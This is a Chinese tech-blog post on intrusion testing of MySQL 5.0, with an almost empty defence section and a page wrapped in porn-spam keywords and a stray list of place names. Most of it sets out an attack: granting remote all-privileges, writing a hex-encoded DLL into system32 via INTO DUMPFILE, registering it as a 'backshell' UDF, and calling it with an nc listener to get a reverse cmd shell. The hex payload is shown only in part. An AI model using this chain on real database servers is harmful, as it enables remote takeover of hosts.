最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

mysql5.0入侵測試以及防范方法分享

 更新時(shí)間:2013年12月12日 09:33:03   作者:  
這篇文章主要介紹了mysql5入侵測試以及防范方法,大家參考使用吧

在做了之前的SQL SERVER之后,便很想嘗試一下MYSQL的入侵測試已經(jīng)防范,與大家一起分享。
總的來說,我一直在用的是MYSQL,對(duì)MYSQL比較熟悉,相比較而言,感覺MYSQL更安全,這只是我自己胡亂猜想的,希望不要引起什么爭論神馬的。。。一本饅頭引發(fā)的血案。。。

正題之一

物理機(jī):Win7
虛擬機(jī):XP

給予mysql遠(yuǎn)程權(quán)限:

復(fù)制代碼 代碼如下:

grant all privileges on *.* to 數(shù)據(jù)庫賬號(hào)@給予權(quán)限的IP identified by '數(shù)據(jù)庫密碼';
flush privileges;


給物理機(jī)遠(yuǎn)程權(quán)限:

物理機(jī)成功連接上:

執(zhí)行侵入測試前(有圖有真相):

執(zhí)行侵入測試后(有圖有真相):

重啟前(有圖有真相):

重啟后(有圖有真相):

正題之二:

遠(yuǎn)程登錄之后寫入代碼,代碼在yyd.txt當(dāng)中,然后在MySql中寫入文件:

Win7 打另外一個(gè)cmd,本地端口映射:nc -vv -l -p 端口號(hào)

虛擬機(jī)上:執(zhí)行映射:select backshell("物理機(jī)IP",端口號(hào));

這便執(zhí)行了3306端口反彈CMD

(沒圖了。。。用到了一個(gè)nc軟件執(zhí)行的映射)

yyd.txt大概內(nèi)容:

復(fù)制代碼 代碼如下:

et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代碼...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';


正題之三:

防范

 

感覺有點(diǎn)亂,主要是分享了兩種方法入侵,但是防范那部分應(yīng)該是XP上的MySql服務(wù)關(guān)閉,但是早XP上做了好多測試,左后XP被我弄掛掉了。。。。好丟臉,只好把Win7上的MySql服務(wù)拿出來了。

覺得主要還是遠(yuǎn)程連接的問題,“如果MySql不開啟遠(yuǎn)程連接的話我們還是朋友”,開玩笑,如果MySql不開啟遠(yuǎn)程連接的話入侵幾率會(huì)小的很多。

相關(guān)文章

  • MySQL系列之開篇 MySQL關(guān)系型數(shù)據(jù)庫基礎(chǔ)概念

    MySQL系列之開篇 MySQL關(guān)系型數(shù)據(jù)庫基礎(chǔ)概念

    數(shù)據(jù)庫是指長期儲(chǔ)存在計(jì)算機(jī)中的有組織的、可共享的數(shù)據(jù)集合,數(shù)據(jù)具有三大基本特點(diǎn),永久存儲(chǔ),有組織,可共享,是數(shù)據(jù)庫系統(tǒng)的核心,本文給大家分享MySQL關(guān)系型數(shù)據(jù)庫基礎(chǔ)概念,需要的朋友參考下吧
    2021-07-07
  • MySQL: mysql is not running but lock exists 的解決方法

    MySQL: mysql is not running but lock exists 的解決方法

    下面可以參考下面的方法步驟解決。最后查到一個(gè)網(wǎng)友說可能和log文件有關(guān),于是將log文件給移除了,再重啟MySQL終于OK了
    2009-06-06
  • MySQL查看所有用戶的實(shí)現(xiàn)

    MySQL查看所有用戶的實(shí)現(xiàn)

    本文主要介紹了MySQL查看所有用戶的實(shí)現(xiàn),文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2023-03-03
  • MySQL中文漢字轉(zhuǎn)拼音的自定義函數(shù)和使用實(shí)例(首字的首字母)

    MySQL中文漢字轉(zhuǎn)拼音的自定義函數(shù)和使用實(shí)例(首字的首字母)

    這篇文章主要介紹了MySQL中文漢字轉(zhuǎn)拼音的自定義函數(shù)和使用實(shí)例,需要的朋友可以參考下
    2014-06-06
  • MySQL簡化輸入小技巧

    MySQL簡化輸入小技巧

    在這里我將介紹兩個(gè)使用MySQL數(shù)據(jù)庫時(shí)候簡化輸入的小技巧。
    2011-09-09
  • mysql關(guān)于or的索引的問題及解決

    mysql關(guān)于or的索引的問題及解決

    這篇文章主要介紹了mysql關(guān)于or的索引的問題及解決方案,具有很好的參考價(jià)值,希望對(duì)大家有所幫助,如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2023-08-08
  • MySql之授權(quán)用戶權(quán)限如何設(shè)置

    MySql之授權(quán)用戶權(quán)限如何設(shè)置

    這篇文章主要介紹了MySql之授權(quán)用戶權(quán)限如何設(shè)置問題,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2023-05-05
  • MySQL中的?DQL?聚合函數(shù)詳解

    MySQL中的?DQL?聚合函數(shù)詳解

    SQL聚合函數(shù)是一組函數(shù),用于計(jì)算并返回?cái)?shù)據(jù)集的單個(gè)值,這些函數(shù)通常用于在SELECT語句中匯總數(shù)據(jù),本文給大家介紹MySQL中的DQL聚合函數(shù),感興趣的朋友跟隨小編一起看看吧
    2023-07-07
  • mysql獲取當(dāng)前日期年月的兩種實(shí)現(xiàn)方式

    mysql獲取當(dāng)前日期年月的兩種實(shí)現(xiàn)方式

    這篇文章主要介紹了mysql獲取當(dāng)前日期年月的兩種實(shí)現(xiàn)方式,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2023-07-07
  • mysql去除重復(fù)數(shù)據(jù)只保留一條數(shù)據(jù)實(shí)例

    mysql去除重復(fù)數(shù)據(jù)只保留一條數(shù)據(jù)實(shí)例

    這篇文章主要給大家介紹了關(guān)于mysql去除重復(fù)數(shù)據(jù)只保留一條數(shù)據(jù)的相關(guān)資料,在使用MySQL時(shí),有時(shí)需要查詢出某個(gè)字段不重復(fù)的記錄,文中通過示例代碼介紹的非常詳細(xì),需要的朋友可以參考下
    2023-08-08

最新評(píng)論

青岛市| 呼和浩特市| 曲水县| 汝南县| 五寨县| 黎城县| 北川| 池州市| 牙克石市| 大埔区| 龙州县| 吐鲁番市| 英山县| 武鸣县| 新安县| 密山市| 和平区| 南昌县| 板桥市| 南京市| 石首市| 昆山市| 正阳县| 永城市| 瓦房店市| 江山市| 海林市| 南靖县| 兰溪市| 遂平县| 增城市| 永寿县| 时尚| 安达市| 阳新县| 玉环县| 焉耆| 报价| 伊川县| 海宁市| 嘉善县|